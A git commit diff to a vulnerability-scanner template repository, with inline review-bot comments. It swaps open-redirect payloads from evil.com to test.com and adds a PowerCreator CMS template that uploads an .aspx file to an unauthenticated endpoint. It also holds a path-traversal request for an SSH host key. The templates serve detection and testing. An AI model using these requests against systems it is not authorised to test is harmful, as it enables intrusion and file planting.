commit
21f8a6c51f
|
@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
| fuzzing | 4 | helpers | 2 |
|
| fuzzing | 4 | helpers | 2 |
|
||||||
| miscellaneous | 12 | misconfiguration | 43 |
|
| miscellaneous | 12 | misconfiguration | 43 |
|
||||||
| takeovers | 1 | technologies | 45 |
|
| takeovers | 1 | technologies | 45 |
|
||||||
| vulnerabilities | 81 | workflows | 18 |
|
| vulnerabilities | 82 | workflows | 18 |
|
||||||
|
|
||||||
|
|
||||||
**Tree structure of nuclei templates:**
|
**Tree structure of nuclei templates:**
|
||||||
|
@ -524,8 +524,8 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── basic-cors.yaml
|
│ │ ├── basic-cors.yaml
|
||||||
│ │ ├── basic-xss-prober.yaml
|
│ │ ├── basic-xss-prober.yaml
|
||||||
│ │ ├── crlf-injection.yaml
|
│ │ ├── crlf-injection.yaml
|
||||||
│ │ ├── top-xss-params.yaml
|
│ │ ├── open-redirect.yaml
|
||||||
│ │ └── url-redirect.yaml
|
│ │ └── top-xss-params.yaml
|
||||||
│ ├── ibm
|
│ ├── ibm
|
||||||
│ │ ├── eclipse-help-system-xss.yaml
|
│ │ ├── eclipse-help-system-xss.yaml
|
||||||
│ │ └── ibm-infoprint-directory-traversal.yaml
|
│ │ └── ibm-infoprint-directory-traversal.yaml
|
||||||
|
@ -565,6 +565,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── nginx-module-vts-xss.yaml
|
│ │ ├── nginx-module-vts-xss.yaml
|
||||||
│ │ ├── nuuo-nvrmini2-rce.yaml
|
│ │ ├── nuuo-nvrmini2-rce.yaml
|
||||||
│ │ ├── pdf-signer-ssti-to-rce.yaml
|
│ │ ├── pdf-signer-ssti-to-rce.yaml
|
||||||
|
│ │ ├── powercreator-cms-rce.yaml
|
||||||
│ │ ├── rce-shellshock-user-agent.yaml
|
│ │ ├── rce-shellshock-user-agent.yaml
|
||||||
│ │ ├── rce-via-java-deserialization.yaml
|
│ │ ├── rce-via-java-deserialization.yaml
|
||||||
│ │ ├── rconfig-rce.yaml
|
│ │ ├── rconfig-rce.yaml
|
||||||
|
@ -637,7 +638,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**56 directories, 534 files**.
|
**56 directories, 535 files**.
|
||||||
|
|
||||||
📖 Documentation
|
📖 Documentation
|
||||||
-----
|
-----
|
||||||
|
|
|
@ -19,7 +19,7 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Cache-Control: max-age=0
|
Cache-Control: max-age=0
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: open-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Open URL redirect detection
|
||||||
|
author: afaq & @melbadry9 & @Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & @geeknik
|
||||||
|
severity: low
|
||||||
|
description: A user-controlled input redirect users to an external website.
|
||||||
|
tags: redirect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/test.com/'
|
||||||
|
- '{{BaseURL}}/test.com//'
|
||||||
|
- '{{BaseURL}}///;@test.com'
|
||||||
|
- '{{BaseURL}}///test.com/%2F..'
|
||||||
|
- '{{BaseURL}}/////test.com'
|
||||||
|
- '{{BaseURL}}//test.com/%2F..'
|
||||||
|
- '{{BaseURL}}//test.com/..;/css'
|
||||||
|
- '{{BaseURL}}/test%E3%80%82com'
|
||||||
|
- '{{BaseURL}}/%5Ctest.com'
|
||||||
|
- '{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}/test.com'
|
||||||
|
- '{{BaseURL}}\test.com'
|
||||||
|
- '{{BaseURL}}//test.com/'
|
||||||
|
- '{{BaseURL}}\/\/test.com/'
|
||||||
|
- '{{BaseURL}}%00\/\/test.com/'
|
||||||
|
- '{{BaseURL}}/%00/test.com/'
|
||||||
|
- '{{BaseURL}}/%09/test.com/'
|
||||||
|
- '{{BaseURL}}/%0a/test.com/'
|
||||||
|
- '{{BaseURL}}/%0d/test.com/'
|
||||||
|
- '{{BaseURL}}////test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/%5ctest.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}@test.com'
|
||||||
|
- '{{BaseURL}}/{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}\{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}//{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}\/\/{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}%00\/\/{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}////{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/%5c{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/〱{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}@{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}/?page=test.com&_url=test.com&callback=test.com&checkout_url=test.com&content=test.com&continue=test.com&continueTo=test.com&counturl=test.com&data=test.com&dest=test.com&dest_url=test.com&dir=test.com&document=test.com&domain=test.com&done=test.com&download=test.com&feed=test.com&file=test.com&host=test.com&html=test.com&http=test.com&https=test.com&image=test.com&image_src=test.com&image_url=test.com&imageurl=test.com&include=test.com&langTo=test.com&media=test.com&navigation=test.com&next=test.com&open=test.com&out=test.com&page=test.com&page_url=test.com&pageurl=test.com&path=test.com&picture=test.com&port=test.com&proxy=test.com&redir=test.com&redirect=test.com&redirectUri=test.com&redirectUrl=test.com&reference=test.com&referrer=test.com&req=test.com&request=test.com&retUrl=test.com&return=test.com&returnTo=test.com&return_path=test.com&return_to=test.com&rurl=test.com&show=test.com&site=test.com&source=test.com&src=test.com&target=test.com&to=test.com&uri=test.com&url=test.com&val=test.com&validate=test.com&view=test.com&window=test.com&redirect_to=test.com'
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?test\.com(?:\s*?)$'
|
||||||
|
part: header
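Review bot: Several entries under `path:` resolve to a host other than the scan target: `{{BaseURL}}@test.com` parses as userinfo followed by host `test.com`, and `{{BaseURL}}test.com` appends straight onto the authority, so the scanner sends requests to third-party hosts and whatever Location those hosts return can satisfy the matcher as a false positive; the deleted version of this template carried none of these entries, so they and their `@{{BaseURL}}`/`{{BaseURL}}test.com` variants deserve a second look. The matcher regex is case-sensitive on `Location` while header names are case-insensitive (HTTP/2 lowercases them); unless nuclei normalizes header case, which I cannot confirm from here, prefix it with `(?i)`. The last path entry repeats `page=test.com` twice in its query string, and the description has a grammar slip: `description: A user-controlled input redirects users to an external website.`.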
|
|
@ -1,28 +0,0 @@
|
||||||
id: open-redirect
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Open redirect Detection
|
|
||||||
author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik
|
|
||||||
severity: low
|
|
||||||
description: A user-controlled input redirect users to an external website.
|
|
||||||
tags: redirect
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/evil.com/"
|
|
||||||
- "{{BaseURL}}/evil.com//"
|
|
||||||
- "{{BaseURL}}///;@evil.com"
|
|
||||||
- "{{BaseURL}}///evil.com/%2F.."
|
|
||||||
- "{{BaseURL}}/////evil.com"
|
|
||||||
- "{{BaseURL}}//evil.com/%2F.."
|
|
||||||
- "{{BaseURL}}//evil.com/..;/css"
|
|
||||||
- "{{BaseURL}}/evil%E3%80%82com"
|
|
||||||
- "{{BaseURL}}/%5Cevil.com"
|
|
||||||
- "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com"
|
|
||||||
matchers:
|
|
||||||
- type: regex
|
|
||||||
regex:
|
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
|
|
||||||
part: header
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: powercreator-cms-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PowerCreator CMS RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
|
||||||
|
tags: rce,powercreator
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 225
|
||||||
|
Content-Disposition: form-data;name="file1";filename="poc.aspx";
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
|
||||||
|
|
||||||
|
-----------------------------20873900192357278038549710136
|
||||||
|
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
Poc_Test
|
||||||
|
-----------------------------20873900192357278038549710136--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /ResourcePic/{{endpoint}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: endpoint
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "(.*?.ASPX)"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(body, 'Poc_Test') == true && status_code == 200"
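Review bot: The `info` block has no `description`, yet the template has a persistent side effect that operators need to know about: the first request writes a file (`poc.aspx` containing `Poc_Test`) under `/ResourcePic/` on the target and nothing removes it; add something like `description: Uploads a marker file via UploadResourcePic.ashx and fetches it back; the uploaded poc.aspx remains on the target.`. The dsl matcher is not scoped to a request, so it is evaluated against both responses; if the upload endpoint echoes the submitted body, the first response alone satisfies `contains(body, 'Poc_Test') == true && status_code == 200` before the extracted endpoint is ever fetched. `Content-Disposition: form-data;name="file1";filename="poc.aspx";` also appears as a request-level header in the first raw request, where it is not meaningful; it already appears on the multipart part below, so the request-level copy can be dropped.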
|